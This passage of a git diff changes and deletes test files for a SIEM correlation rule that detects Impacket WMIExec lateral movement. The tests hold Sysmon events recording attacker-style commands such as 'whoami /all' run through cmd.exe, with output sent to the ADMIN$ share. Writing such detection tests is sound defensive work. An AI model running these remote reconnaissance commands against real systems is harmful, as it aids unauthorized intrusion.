20:32:51.324\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-0010c43a1d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2828\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c whoami /all 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-0010c43a1d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2828", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.486Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.324Z", "type": "raw", "uuid": "96275d9e-aef9-45ba-8e2a-b13766c64ad8"} -expect 1 {"correlation_name": "Impacket_WMIExec_Command_Executed", "datafield1": "cd "} +expect 1 {"action": "execute", "alert.context": "Executed command: whoami /all via WMIExec", "category.generic": "Attack", "category.high": "Lateral Movement", "category.low": "Remote Services: Distributed Component Object Model", "correlation_name": "Impacket_WMIExec_Command_Executed", "correlation_type": "incident", "datafield1": "whoami /all", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Impacket_WMIExec_Command_Executed|iewin7|cmd.exe /q /c whoami /all 1> \\\\127.0.0.1\\admin$\\__1556656369.7 2>&1", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-0010c43a1d00", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2828", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_3.sc deleted file mode 100644 index 33d153ff..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_3.sc +++ /dev/null @@ -1,3 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.3248390Z\"},\"EventRecordID\":\"9828\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.324\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-0010c43a1d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2828\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c whoami /all 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-0010c43a1d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2828", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.486Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.324Z", "type": "raw", "uuid": "96275d9e-aef9-45ba-8e2a-b13766c64ad8"} - -expect 1 {"correlation_name": "Impacket_WMIExec_Command_Executed", "datafield1": "whoami /all"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_4.sc deleted file mode 100644 index b79fa353..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_4.sc +++ /dev/null @@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.3248390Z\"},\"EventRecordID\":\"9828\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.324\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-0010c43a1d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2828\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c whoami /all 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c netstat -tulpn > 1.txt | type 1.txt 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-0010c43a1d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2828", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.486Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.324Z", "type": "raw", "uuid": "96275d9e-aef9-45ba-8e2a-b13766c64ad8"} - -# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Impacket_WMIExec_Command_Executed", "datafield1": "netstat -tulpn > 1.txt | type 1.txt"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_5.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_5.sc deleted file mode 100644 index 86a7fd25..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_5.sc +++ /dev/null @@ -1,3 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.1685890Z\"},\"EventRecordID\":\"9826\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.168\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-00105f321d00}\"},{\"Name\":\"ProcessId\",\"text\":\"3840\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c cd \\\\ 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-00105f321d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "3840", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.485Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.168Z", "type": "raw", "uuid": "4d37a299-56f3-4a2b-8d40-da1fcccbc1ad"} - -expect not {"correlation_name": "Impacket_WMIExec_Command_Executed"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_6.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_6.sc deleted file mode 100644 index 8c15a378..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_6.sc +++ /dev/null @@ -1,3 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.1685890Z\"},\"EventRecordID\":\"9826\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.168\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-00105f321d00}\"},{\"Name\":\"ProcessId\",\"text\":\"3840\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c cd \\\\ 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-00105f321d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "3840", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\somepath\\wbem\\wmiprvse.exe", "object.process.parent.guid": 